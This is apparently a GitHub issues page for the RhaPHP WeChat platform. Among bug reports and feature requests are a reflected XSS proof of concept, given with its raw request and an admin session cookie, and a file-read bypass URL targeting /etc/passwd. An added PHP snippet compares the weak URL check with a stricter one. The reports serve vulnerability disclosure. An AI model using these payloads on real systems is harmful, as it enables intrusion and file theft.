geesondog / rhaphp
RhaPHP is a WeChat third-party management platform and WeChat official account management system. It supports managing multiple official accounts, CRM member management, mini-program development and app API development, and brings together almost all WeChat features. It is simple, quick to pick up, and fast for building all kinds of WeChat applications; projects get developed several times faster.
Home Page: https://www.rhaphp.com/
The database configuration is currently hard-coded in the config/database.php file, which is inconvenient for development and deployment. I suggest configuring it through .env instead; the code would look roughly like this.

Partial changes to config/database.php:

    <?php
    use think\facade\Env;

    return [
        // database type
        'type' => 'mysql',
        'hostname' => Env::get('database.hostname', '127.0.0.1'),
        // database name
        'database' => Env::get('database.database', ''),
        // username
        'username' => Env::get('database.username', 'root'),
        // password
        'password' => Env::get('database.password', ''),
        // port
        'hostport' => Env::get('database.hostport', ''),
    ];

Add a new .env.example file in the site root directory:

    [common]
    app_debug = true
    app_trace = false
    [database]
    hostname = 数据库地址
    database = 数据库名称
    username = 账号
    password = 密码
    hostport = 3306
    prefix = rh_

At deployment time, run cp .env.example .env directly, then adjust .env for the target environment.
Hello 👋
I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@0xROI) has found a potential issue, which I would be eager to share with you.
Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.
Looking forward to hearing from you 👍
(cc @huntr-helper)
I added a scan-code push event to the menu, but no event push seems to be received after scanning.
Why isn't index.php placed under public? In its current location, doesn't it allow access to every directory?
The "new followers" figure is actually the net increase in followers.
admin can manage all official accounts.
Newly added members must be bound to a specific official account.
When a non-admin account logs in, the current official account is switched automatically to the bound one,
and the two menus (switch official account, system management) are hidden.
Official account -> Auto reply: when adding a message of image type, the uploaded image is treated as permanent media and the upload fails.
404 error after opening the site home page? Permissions were set to 777.
In app\common\model\MpMsg.php, the SQL query in the messageListByGroup function reports an error:
$msgList = $this->where(['status' => $status, 'mpid' => $mid])->field('openid,count(msg_id) as msg_total')->group('openid')->order('msg_id DESC')->paginate(15);
The order by msg_id here is the problem: order by can only use columns listed in field().
I would also suggest not querying the database inside a loop; fetch everything in one batch and assemble the result inside the loop.
How can I contact you? I would like to pay to use your merchant onboarding mini-program backend. [email protected]
When querying menus for display, add the condition
->order('sort ASC')
to the mp->menu method.
POC - XSS
Parameters: keyword
Attack Pattern: keyword=1234%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
GET Request: http://10.21.42.29:81/mp/mp/autoreply.html
===================================================================
GET /mp/mp/autoreply.html?search_type=1&keyword=1234%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E HTTP/1.1
Host: 10.21.42.29:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.21.42.29:81/mp/mp/autoreply.html
Connection: close
Cookie: PHPSESSID=k2h7v7f0cflanglepjtsnr0jv6; think_admin=think%3A%7B%22id%22%3A%221%22%2C%22admin_name%22%3A%22admin123%22%2C%22password%22%3A%22fd9f12b2d09b5afd461f1a05cb66c8c6%22%2C%22status%22%3A%221%22%2C%22ip%22%3A%22127.0.0.1%22%2C%22last_time%22%3A%221550625853%22%2C%22rand_str%22%3A%22ZiEydp%22%2C%22admin_id%22%3A%221%22%7D
Upgrade-Insecure-Requests: 1
===================================================================
Vulnerability Code: https://github.com/geesondog/rhaphp/blob/master/application/mp/controller/Show.php#L21-L23
The vulnerability lies in the use of the strpos function instead of the substr function to determine whether the incoming value contains the keywords "http" or "https". This allows for certain methods to bypass the check.
Below is an example of how the vulnerability can be exploited:
/mp/Show/image?url=file:///etc/passwd#http
This can successfully read any file on the server.
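As an added illustration (not code from the RhaPHP project), the substring check described in the report beside a scheme-based check that rejects the same input; the function names and sample URLs are my own, and the only non-HTTP input used is the one quoted above:

```php
<?php
// Added example, not RhaPHP's code. Function and sample names are assumptions.

// Contains-check: accepts any URL in which "http" appears anywhere, including
// in the fragment, which is why file:///etc/passwd#http passes.
function isHttpUrlWeak(string $url): bool
{
    return strpos($url, 'http') !== false;
}

// Scheme check: parse the URL and require an http/https scheme plus a host.
// Anything that fails to parse, has no host, or uses another scheme is rejected.
function isHttpUrlStrict(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

// Constructed samples; the third is the input quoted in the report above.
$samples = [
    'http://example.com/logo.png',
    'https://example.com/logo.png',
    'file:///etc/passwd#http',
    '/images/http-logo.png',
];

foreach ($samples as $url) {
    printf("%-30s weak=%-6s strict=%s\n", $url,
        isHttpUrlWeak($url) ? 'allow' : 'reject',
        isHttpUrlStrict($url) ? 'allow' : 'reject');
}

// Even with the scheme check, fetching a user-supplied URL server-side can reach
// internal hosts (SSRF); restrict the host to an allowlist as well before fetching.
```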
*.Com/install redirects to a 404? Pseudo-static URL rewriting is already enabled.
Request: add a third-party login authorization mode so official accounts can be managed via authorization.